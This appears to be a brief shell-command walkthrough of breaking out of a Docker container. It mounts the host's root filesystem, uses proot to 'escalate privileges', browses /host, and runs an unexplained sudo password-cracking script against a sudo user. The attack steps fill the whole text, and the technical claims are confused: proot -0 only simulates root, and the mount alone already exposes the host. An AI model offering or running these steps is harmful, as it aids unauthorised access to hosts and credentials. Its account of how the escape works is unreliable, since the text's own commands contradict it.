# Assume we're running a Docker container with a Bash shell docker run -it --rm -v /:/host ubuntu /bin/bash # Inside the Docker container, we can try to escalate privileges using `proot` proot -0 -r / /bin/bash # Now, we have a Bash shell with elevated privileges inside the container # We can try to access the host machine's file system cd /host ls -al # To gain access to the host machine as a sudo user, we need to crack the sudo password # (This is a highly insecure and unethical approach; do not try this in a real-world scenario!) sudo_password_cracker.py -u sudo_user